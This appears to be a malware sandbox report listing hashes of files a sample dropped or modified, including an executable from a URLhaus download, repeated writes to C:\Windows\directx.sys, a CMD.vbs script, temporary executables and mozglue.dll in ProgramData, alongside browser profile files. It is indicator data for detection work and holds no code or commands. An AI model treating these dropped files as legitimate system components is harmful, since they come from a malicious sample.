| SHA256 | 1490105c73976217f35fe31d65939d1d9711d370c61f3d7d892afbb07eaaec63 |
| SHA512 | 3892f3e4188250ab0d3508dd9c1825fa6dfab4fc50b4bc858703123e5512071d710fd8431f94912e74eaa4ca29b40c0b1b97805a5432a07fc09c35a87e6b23d2 |
C:\Users\Admin\Downloads\UrlHausFiles\file.exe
| MD5 | 16b50170fda201194a611ca41219be7d |
| SHA1 | 2ddda36084918cf436271451b49519a2843f403f |
| SHA256 | a542a2170abf4de0cd79baeb2e8f08deaf6fdeea40e9fc1ec15cbeb988e7900a |
| SHA512 | f07ed33310acc5008cda9dbf3c50e420ad3f76ed11b28b93b2bb32d47ddbb64c97b906babaf6edf2680bea5b6f7456c7986a8610cee30b867d3a07c4430f79e0 |
C:\Windows\directx.sys
| MD5 | d55790b2e07037510a0a41e6b4f138e6 |
| SHA1 | b352aa18e31bcca13b90c89344f4b9e015a6ea27 |
| SHA256 | 81d3d2013ab6ae4193d3de506f0b9c214b05f935ba15d19212931bbaef4be95b |
| SHA512 | 497c1c2acd3ea1dbdcf44e1d9f36632b85e08c8bf8bf3ec6694331526f6cf7fd44f90355c03b0210ed91f000e0a28bf21240ea24f88029590a861dea53667999 |
C:\Windows\directx.sys
| MD5 | ccf75b70dd02f10b6565738695343dec |
| SHA1 | e92280dda7efb48dd7bdd0b4e937872c74d52449 |
| SHA256 | 22321ebaf7b22b8bbbb0559465b2d29a91b8d3b5798bded323ac35a1d94359c3 |
| SHA512 | f35c1a1a3c4c460350e7915bb709fbb18c4949f25b216c733fc663860473720ae31db9cd405371d609d279ff0da5bb648a723b1c1bfd7fe8f0f6e981a53d6b29 |
C:\Windows\directx.sys
| MD5 | 3811c92d236bf9ebfdddfc1dfdffda04 |
| SHA1 | 033259537f0573d7a7fae7bba54d636b8224c7f1 |
| SHA256 | 217c5524803d2e32e0c00d6234d3ce7413ef784f199a70506b66ccc5e119c815 |
| SHA512 | 1ef21d568587df8b127cb9e085e938ad84313b8978705f782780ea0352342643f896966634c76eece224e4e5348e15de7049db7aa8188f8e07c86272d52b4295 |
C:\Windows\directx.sys
| MD5 | 81ca3d8f26c9841692005cd52b41b237 |
| SHA1 | a1f2d403e5a123d080321f801316a09ed21a4b34 |
| SHA256 | c64c02240106d3b1224db46a3e7b59076d33e1c951410e7cf430d27a97b3bc59 |
| SHA512 | 223a30c785489a1cfb5d7fdbd4fb7cc861b6265042adf64e9dd8afae516be017e9430d3afeac9db1a29132bcf65afd156be3eeb839f3ed776f8fe67243700b75 |
C:\Windows\directx.sys
| MD5 | b6cce93ac23c2792abaf61736a90b8a3 |
| SHA1 | 8b9fa70a372ffc4759c6a3d1286d154249cc3673 |
| SHA256 | dcd7c9090129deccee588d6177bf5f3bcb2c5e748a574573d7680b3615b95e36 |
| SHA512 | 2caf561fb7e2d4db7a377814abdadd34704fcf90ec7e15e83eae5710e8241a989a9ffaad13bec81028be6aedd192b4ee5cebfd2ad32f4d3fbea5c498c6563f1d |
C:\Windows\directx.sys
| MD5 | 9b3b3ecf93dec3134980e0eeb41ee3cd |
| SHA1 | adccb132d750e2e50a31f6a92a36bc7d38acea01 |
| SHA256 | 212016c7fdd3ee0e3c7d64f29af947c169bc89f89c5db7364ac3d740dd1e5de8 |
| SHA512 | 88056833fe0f7aca5d86584d49ef57bebf4466bc0e3fb98ac34f2d027f2f0542c5339da72311dec8810307124d256095a2b7139c51e328afed58a0f8cc741ca0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 93b8c1748d61cafe3a551571537b0cdb |
| SHA1 | fc1630795863d50a7e507244a42c4174d03dcba4 |
| SHA256 | 2a395cc7dc19acb6677c3d919dc2771198439f3fa2d2a15514ddd5cd35490129 |
| SHA512 | 35c18192d09839bf60513ff659c5eee3456d8bbb2aa0403ac6fd3c302e5479ed9d4453cdb31058a49bb7d6ef62257b54c6637cbdf98517112b137b2631ad4542 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4d0a6514809750b77b7e837ebbf8c19c |
| SHA1 | 0958afe1d4f86c07bcdd3d66d827c408145bf2c1 |
| SHA256 | 0a6a248e29e7337d68119f95211b31fe02aeeeca0ff66e7e8c085d81642bfad2 |
| SHA512 | 7eb0a8a34d4d31b4767dc0a4d98bf32612442500ac124645c70270f075a9ac12283a9ae0c896334694ffbe405f95017ab88fafffa3ca9a8e6a2369bc0d0b8aad |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3495501434-311648039-2993076821-1000\0f5007522459c86e95ffcc62f32308f1_ccb8eda8-03c5-41b1-ae24-26e7c7115f30
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\Q7112G09\download[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\3644.tmp.exe
| MD5 | e0a745edcc32cc7b0fe58794b0722fac |
| SHA1 | fa87bf5087a2a013fda69721aa653d41bd57657e |
| SHA256 | c9c8e138a0b3f6fde60740a7fba42e107daac399e5c99ec710309f88553efbb4 |
| SHA512 | 9b8367d852915003f769698b34df0fd3ba900fb7385fefb0960088ff9f10b00ea101bb2c112cde9929e2ffb176fe2f99773876748fa35cc66b5fd3149ef2b2ef |
C:\Windows\directx.sys
| MD5 | e0e18ffa960a128c2f301d428b040a56 |
| SHA1 | 2ade112a022d2dab583aab56cdc4ec6731f7bdd1 |
| SHA256 | 7b4c33e7103970bef1f90316e1d3efd320da9cf44f578110ced5e9d0b71e5956 |
| SHA512 | e5424e32b10f879ee0447fdc95de7285b7ae8632bc663a2f934e92eb7e3c996c4a05b51377cb0674261ae3be844d41e4e0987a5347dea6db461f7f5b389019c6 |
C:\Users\Admin\AppData\Roaming\CMD.vbs
| MD5 | 238ec4d17050e1841e8e0171407c2260 |
| SHA1 | 2c8c14b257641f1e1151c6303dabde01621314f2 |
| SHA256 | 163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb |
| SHA512 | 3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 51f387013b5aaf41d159a9bbfdfc2609 |
| SHA1 | 7aab38edd394f8725a2e0b80bcd5c46f3d9cf45a |
| SHA256 | de4896503b2ee893f841a696ce4eba75f69a5d2345d88a583e5065aef6b8274d |
| SHA512 | d523bdfabbed63e8375234e1e7fce54691de886a3d7ac3313b8b7c77d32f874a94907e0d0f9fe2c57e8bda8812ae1e7e376383bcbfa469d48822d22bcdb3e9a4 |
C:\Windows\directx.sys
| MD5 | 58ecabacd10cb10527493d2125234b57 |
| SHA1 | 9548d21a6d92cadc5ddf0875f62f98bc0818275b |
| SHA256 | e316140d097f418102e1c4177f2026f1dd366b629a2e621f232e994a3bb0c5b4 |
| SHA512 | 7535ed79e163b34c2867828bf9eff44ad18e43b66e60e94797d563e17f44fccdb6a4fd217eb1769c858a57af7d5b5bbad42bd5d18390d1e1465aae3864afa096 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d3adfc9ce19c37d8a96b1b2747c8cead |
| SHA1 | c5dc7444d1dc62afce833a17c6c9401f21f8a1f2 |
| SHA256 | a9fa7f2a293777159ab91a2b0fcb68e32c88b53ed7732b26b0fb80cc72faab50 |
| SHA512 | d21a6c5673ee6902ecd434f1db35673e511888a7e950fe05c6ec67a4b57b1a40fba15afbe71dd20b16de2ef6a9a9d7a584535a6a03a6a64b8673c32feb9eda3b |
C:\Windows\directx.sys
| MD5 | 379da762af3c612a6f42b333b82a496b |
| SHA1 | a04e26fcd5e847af3f65714019e58031dc9bd670 |
| SHA256 | a02d7e933f4c418a247c916f79e1babc49c5ab0c5605fe0485843b0ef26b54ad |
| SHA512 | 65b07be22dd32447834a462c59cd809a34491ec1afba2ea67c93687c774ca00273c2b25f463e6418041cca3493206b24e19732ab1f4c19e36d33314872125023 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f86d3912-f273-4834-b8ff-1bde0d891b6a.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f8e08e91cc906dbc013f8739ccb4dcbb |
| SHA1 | dd039f3ca3c0339cedb043df827246d8bfc79448 |
| SHA256 | a372fb94e10d66e22d9c88c16a1834a9acbe5df0c1985a55ce4779cded0e35aa |
| SHA512 | 6f1186ac9d9ac8a2f24224fbf7b3c351f9e7ff9c1633d581bc18d91101784f8bfb32719e5146d063113572f71987f2eeb1d3eecc954f7a2b791520f7bb6fb7ec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f93fe13e99ccb1332a894d5cbafac8b6 |
| SHA1 | 64206e26f2ae56201ddd12173626852b2c0d747c |
| SHA256 | 0766a99f87ecbd871408c1f46290814ae4d91aa929910737a714b72e18b3633e |
| SHA512 | 9184fece8a96550b08937c21772a3cc0b1381d9988bc05e37d01ddb785ab38c0e3de5e22df0ffca5128ce3b73d42ff95312887578e48cfacd907da5b5262c0f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\datareporting\glean\pending_pings\d4d5e792-8543-4686-b086-0275f85c5f1b
| MD5 | b8b266c4c12b4a58e26d9d6642a86a6f |
| SHA1 | eed1c52a8ebd1348f7b94dfd85f376d1383bac8d |
| SHA256 | 603928e650d33dcaa72372756c84f654a4e3e2f1f99b1240fe88964dc75ab9ac |
| SHA512 | d95c015b0e836de8da97b693a283a8c2c4f4971df53b5fd436fe35a0a2db3e4a3b3fe932d82fa1dd2b862cea959bc2c21ed97d74c2b70a3585ed38619251fb22 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\prefs.js
| MD5 | f109c63a059d7a1189e0935583833494 |
| SHA1 | 0998d819e7a52a7e0a6c7063f5c4c78dc5e5a10a |
| SHA256 | 256c2c4edb76d662410e2da7bdb904000429e939c83e624556711cee01ae4766 |
| SHA512 | 935a4efab49c3f7654db8f90fe11e4060b89ff7b9d6ebb6b9442a41fed0f0a274db38d1b01de7ee5db3947fbae01a4505794b1ccd1ecd5b3ba37479070bb102d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | a9c67441dc52a157043b7cd1ca0cb41e |
| SHA1 | cf64f12913fe3130df1b07dee5efe457ceecb2bc |
| SHA256 | 085a731ee4f0627164e965043d3efcebe6fc2a1ee7b3a94d2c5ddc314df288ae |
| SHA512 | ff29055f318339176dcf91ad9b8de43d11123975c11a7e45b784cc4ca6bb8e45adb93556e25550baba5ed69ebf4eb482ffdd38455dfdf9becef86281d8d9e7e0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\datareporting\glean\pending_pings\571b09fd-8f18-476e-b6f5-d3cfd35bd843
| MD5 | 0eb8454ce2bcb3777041d9f045aed299 |
| SHA1 | bb71fb632a03f77ac596640600f78540e94da174 |
| SHA256 | cb3fea8f1d841d4fc12fa8f27aa67da192895f8bf75a9c80efec3b094f71db11 |
| SHA512 | d2de9dc3720bedb29d7a2af1e861964a85e8d41e5dd9b95c4b16668ae752dc301126ee549263445069a8b97cf37f630c1d310b8f07f50fd5929bb7eb18027da3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\datareporting\glean\pending_pings\45ff3742-2e1b-47d8-94bf-99029ebaf0da
| MD5 | 2bbf349f8d191104a79623760d24acc4 |
| SHA1 | 5e00f6516201f4607dcd3e733c6dca0a8df509f6 |
| SHA256 | 91adb60126ab27ec6c5774734330dde40cf550208f5cec3e09703553a8ada110 |
| SHA512 | 5859289df400fe042cd875609704217fc23dd2fbf0d4047f607a91f3eeb5b6a8b32f272a4d02d0f0719ce0cb9766a5abda24f514e845fe4fe707c6ea4f182704 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\prefs-1.js
| MD5 | cb7dfb1853de209d57263a8f78d82b04 |
| SHA1 | 3b7ed75accbad777e6adf1bfa4b6644b17906216 |
| SHA256 | dbd24fecba36a65671950ee730a4d71dd558e5d015b1b950826366f5a01ff6ab |
| SHA512 | 2fd3113f81da58e9b6d4d77f78a5ca145157599a31b30cca1691f519abe5dac6ca312a6e64722414e02c9a5c0d8d7d4836d0d2bf60a3e385957e544398d9f5ee |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 62c6758b5ac6472f1fcf0552ea4b811a |
| SHA1 | 385483c1776e1fe7027eb75d712468c1098992d6 |
| SHA256 | 08d358578b50502197332ecde52ff37100d893a0d8ece5c84cc7f90fb3d34763 |
| SHA512 | 776959369e47a83c8d20fad7a1e3c84340cee295fe5d8d00ab15b0b26ea3d37acfdc6a2dfb6f2895cdcf504bc3fdd915e31d6f9a7d3657c58ebc59dbeec273f6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\AlternateServices.bin
| MD5 | e73d672f1f1987fdf54903fc9f18e4d7 |
| SHA1 | f55a14dd454c25aa4ea2a592ed5514bf0300ced7 |
| SHA256 | 1133a254b93bf54c505a0b524d08a510068584e69c527818d4936abec443128f |
| SHA512 | 46ef962632a513982aa4574eaa5ea1f99af2c8010cdf782db45673fe10b1125249b860bcff1ba353c1b50b1db24ab7cede0a1a56b737443c5bd698502dcb571b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f2a503a81f5e9e2e4049935ec16696f6 |
| SHA1 | b59c286c4591e4b17eb1173f5958f62d8abf700a |
| SHA256 | b4a148a85ffe5281834096a720c885a4a6597422e4efafba3c710528c66baa38 |
| SHA512 | 2a07d8b8d528d864fb45b09a9eed98cdc0201b096b9bcb459440852a819e2b78fcc29f064a4c44d081f36c93c8d52d5f6dc3f02bcca594d98e2d9203ea86d312 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 4a8282ae90a5a3df1fa49210ae8c2f95 |
| SHA1 | 3c4ce45c6b17ade487a810def96921bf79a5ab82 |
| SHA256 | 4c7d82e79ef81b812e393f93660e71130174f55b806bc93d9d6385edf591b571 |
| SHA512 | 7aff33271a992605ef424b6ab208083e591a18a5a8cbb2035f4f2d137cf1120e3062176225e10c539813140921bdc0367d84131d4a9f2c8e6b0c88970969b6f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\aa69c064-1687-48e5-a457-065383d4ff73.dmp
| MD5 | 7ce8e75797c8155736f412f133c53748 |
| SHA1 | f4b10c760403073ba6a41f4d258862b4e7de3e8c |
| SHA256 | 2fbf1e3de8fd0858820d6b66c045af69f671226b25fafd867a4b5f7ecadde562 |
| SHA512 | 3d8a83b5e3bc290952bf55da298c0e404389b163fca4aa6cb0d97412370e7ca020b2971f4734796b0525cb9c98ac3b0183de02fe0724ccedd208c8072cf182d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 39b5075df1ea5222f9ba14a30ecca66d |
| SHA1 | ea6426a6a22a2c8ab686c195cdf933229a73ed60 |
| SHA256 | 21657025796947c8a888516416622554a319079b58c12fe9f7d32041edad2701 |
| SHA512 | 677139ed19a6c5b78a39397517218f61b2d359338e63941d9e01b2c4854245d8c1bca09ccb11d70641f53864972adb88375bd911d48d09ba3fc6298968ce9392 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c47ea9be-c29c-4346-ab06-996a672d35b3.dmp
| MD5 | a1bd6a892720f316d3627ff06e048920 |
| SHA1 | 102b57a04ad76bb62547390c0b94e54e9a5abbdb |
| SHA256 | 8ee110ec8455dd6c112d73be9356177681e0996b92bd07b0fb50c975792abf34 |
| SHA512 | 8f3c33796113c54157beb53eceb03d300fb14b9a9747179f6ffaad658d60e479f1b87cf537cf8528a52b0a3a060902a1e4859e1fb1019e042ce76fb180d3865b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d648f1c3e8d0d4c5fc7e524fa944c470 |
| SHA1 | 7ddf585d42cddf556b24245cc1629b47bea3f1e6 |
| SHA256 | 26ae126052ea62f108f8222790c4cb72d576505a36f613acf4dab3ccf6d97827 |
| SHA512 | 84ae70929a6d6f26987ad56af101cc0d7b518cecd5a09705b88a2af092666435281b708b19c4666648ed14b680b7671088649c6232730441d4e8f47b79ee4d9d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6214640659d6f07be087940fbe7ed01e |
| SHA1 | e7d111742c707682971d5ab6214100423fef1cff |
| SHA256 | 773b981c0a5d80b0a14b7f79fa4374818d1735021d824cd6ca8bda6091b554cf |
| SHA512 | f62c07bdcfaf1f43293dae81c3a1b08de1f8ce3763ac919676aaf62ed2f5950d80cc0d5e4ba71c893c98d4d93b916b603f8f2274cc75739e09b0771cc43a5b85 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1f3102bc-31eb-4727-a562-f2fff9475dcf.dmp
| MD5 | fe122b2894d3ae721b96241214baa2aa |
| SHA1 | f05324b00561720f5a443b4bd35377247fca646c |
| SHA256 | a9bd58c8dc538aee4851fd4a7d508dd75ee94931ffad5cfda547876baafe9bf9 |
| SHA512 | e57040399a0703098a58435b64e52baaa97f2bfb730a84dfaca4a200fc16c5ce204f2cbbbb3af564929045064ecf3a0902a405ed49e63287e5b5cb97e1bfc2b4 |
C:\Windows\directx.sys
| MD5 | be7ae462c8213de7c487e49df0ed0171 |
| SHA1 | 3ee6853ad52679a916ebead929344477ed804030 |
| SHA256 | 6c0bba21c14585052a0dbd51c0aba8e7651ac0e034b68ec7c90b50ebfdd52e52 |
| SHA512 | 2dc1f9b32849684a905f65894561dfb3c1938b3990c701b76dd7a597b50deb01ae3d6d902a81641e3051cf75fa6edd81f68bb74de0c95169967bac1de624d0da |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ac591b1ca7f178d5625d4c1699dcff5b |
| SHA1 | c02fcba2e3e0e06d588e40c9081d7e00088f64b7 |
| SHA256 | 1ddfc050cc24ab88f9bdb264036013720c6d6a49dc3b2a1e31610b667fb7abde |
| SHA512 | 77df5b4ef6c4a2a05fc2e68b14d0c41e0b714992c36df1493185f9d9d2971fbeed29bfb5e412296be1cb11cc8e53dcdc0811e7134fe9c09fa1490d9f18fbf6f4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 2bf2d125c7853f70ea19544c7e477733 |
| SHA1 | efcb265edded8c6fa9bfa584513b168559963bb0 |
| SHA256 | f1769609ef004fa743026a216e3332be897965725f7d0cd3310d972c703af8bf |
| SHA512 | 1001e8644cdac8c22b291373e16df070e081b04d475ce943ef31c9a078a330edfbb4412636ee720f8010afd2e1acf5498746a4c197a569ed7aeae02bdf8b6eb2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | fde4df520933fb931f192326ac045c28 |
| SHA1 | b7b904e13ddd4cb99cde3259ecb74bed4c9dc428 |
| SHA256 | 24864f53c0740d125c3d480a743a9f0880200d6cefa224be2acd2a6091282e48 |
| SHA512 | de9e47edd5a0929393308af69503efb607b89b55db29bec5daf7dcd586c5cbcc6e993f63dd245d0ed1dd1028b8217fa0b73974b01709fa1f8cf633403fb38045 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ce5dd4f6-1869-4be2-8fe0-22c4a8ebb86b.dmp
| MD5 | fb94a5390bcb43870d75001a15379177 |
| SHA1 | 6fe002718a01cee9a2eb830faeeb77046bbb1f83 |
| SHA256 | 587a6adbff4b05b5da4db8ee4c1582c03836232e62300e90e9824b79d5c6aa8a |
| SHA512 | 6617ebd32632f0706f157c3c67c60360d3ca2eb0baa695b8833da207e5dea2e3ded25cc94627b487d0bd43ed6ffdcf6e88cb237c02863d5cef433fa649383a8d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | d6a00623f64410f329b9c151b9f43dab |
| SHA1 | 38b8f0ff6ff4c726131e0d503cb78eb0e95c38c6 |
| SHA256 | c1cf60a3fda85913b0850aae1b7c19ec1388755f8462a1b116832e00bb38c62c |
| SHA512 | c01f6a1811772e666c791608d43316b7e60fab1dacf70b29a5da3bd9f7e6b7139c086256cd755ab34a141cefdefe082a52337d3ee1eda947d862d608c32b9383 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9db1edd3-7ab8-4f3c-8168-e00b604e5ccc.dmp
| MD5 | a3d943fdbf1431b9ea7de8fde154bd7e |
| SHA1 | 7ebcbbc52725e803d5db631930b36ef31cdef0d3 |
| SHA256 | 951735a953e4cf39598e97de7f643beccd49d32266419c39ea9a733615423ed5 |
| SHA512 | dd58465a25cbffaf69caafb5afb659b2cfa3f241a401661d6ad9f8483c9ba3a27c7c81b0ae034ef90bb7f4d4bdc5f3e0e756d39fc6afb89fee59c61cb85b6383 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 350af9db674c845e145580c10fbe39f0 |
| SHA1 | 5c029141b5f70151c425e7d23e516bf7e9882f3d |
| SHA256 | 35f69e3fd635b4ec8ee85b7d6debe5b94758509ca0c00d083c9aa8899c75dc68 |
| SHA512 | 644b49bb3386f7f0c017d7ef19875aed149eb532dc9a50450203de0cb329ada5cffc95e145c70f0c82a38875f5fb414bbee7f9a52afd4d7381ad81b05f7036ad |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3495501434-311648039-2993076821-1000\0f5007522459c86e95ffcc62f32308f1_ccb8eda8-03c5-41b1-ae24-26e7c7115f30
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\prefs-1.js
| MD5 | 45f3d92814ae8eddf5db9dea570cff46 |
| SHA1 | c8bb155206f0ab66e20bcf223ed840906b04a1a3 |
| SHA256 | c7e29d4e47c8e502653ba89a13ff5f19b19a48034fa0d8502716b8565b31496f |
| SHA512 | 68c8248b60e642fe28717b79749c2c6c219951089b5f642a780796caea49878c670ec35372e72188cd5ed366eb6454a10067d38c4f074e41c00b03a47070a719 |
C:\Users\Admin\AppData\Local\Temp\Montevideo
| MD5 | d635e27514a1f665b02fbb140a9117ab |
| SHA1 | e496d02b4b6caee2f1b2bc8107cb6d16fa74e0a5 |
| SHA256 | 0c5b07ab60b1c43a5e44d4d4e63b17d17d7325263fd8ecb570bce9221aab5210 |
| SHA512 | 3cc438d9e783aed5b6e138dea4bb9b8b4a8e1669a0004e4536ccaa73a29a03e89429e3b5de6651c9f6d5a6bf7fd1e1b6a658f1441cd09a33430ce3e986610fb0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 0b096754c0aae0a13f1403a45b9079ce |
| SHA1 | 3f3741e86beaf8db4884dee1ce220053d317d6ec |
| SHA256 | 3567a2ecf66bdde80dcb3f1570c9056c72ee1fe4afc77c57978145915e3386bc |
| SHA512 | 32f8d303a305b38ad0f1d5b49bcf423dcae9b65a62cd4ca3107c327351e0722aa42375a7f29410a9a4264bf31c85952edf85e80ee8850dbe72afa854a0fcddc0 |
C:\Users\Admin\AppData\Local\Temp\autF4AD.tmp
| MD5 | cad8bd2139d6d7a1ab09bfd32d9496d5 |
| SHA1 | dfb63f6ca4f117a45825cf6a60f7bab71fffbece |
| SHA256 | 5b870d44c946d17f9eb7569f19b674130a022c07211c315b4fe2603183f196d3 |
| SHA512 | ade1d8a48054ee4c7162a0a5c047095ab18c00146a733e269a3021fcd0a7baedc7a71d34e7452fc26118dc256a701c52eb157e7fb5e5b5b5769063b67c8849fe |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\Local\Temp\tmpAEDA.tmp.exe
| MD5 | 898988b95ea724890395b07079931a87 |
| SHA1 | ebe57eb9e5dab3691e41dddcf0115ec224475efb |
| SHA256 | 9f507ff3786be35b00d355ff460460bb1f11399b5e8e12ddda5fdb9af64a561b |
| SHA512 | ff80c8ac06e1127ea871a3b2ad605d723a466ac0d6fd7ef5e15e6008fd45dfffbdbf0d5b585e10b8b3e1347f810167c6e5f2a6bb2e8cf8acd79de10c1db8fe52 |
C:\Windows\directx.sys
| MD5 | 961dac9e6c3d7fc36a2c25af58be96b3 |
| SHA1 | 3ecf531200497b568ad4875a542488bc4568c33b |
| SHA256 | c0dcb9003858f16c1aea1d64cf5b63136a1b04c11d961e0eeade92e61ce002b7 |
| SHA512 | 405ec3176dbe1772fd158095db41f3066754184ca7cb456d7f8a88c878c269fd22bcb9be2176898e4330c863de921a49e0887bddc8c62be8160d35cdc0ad0711 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
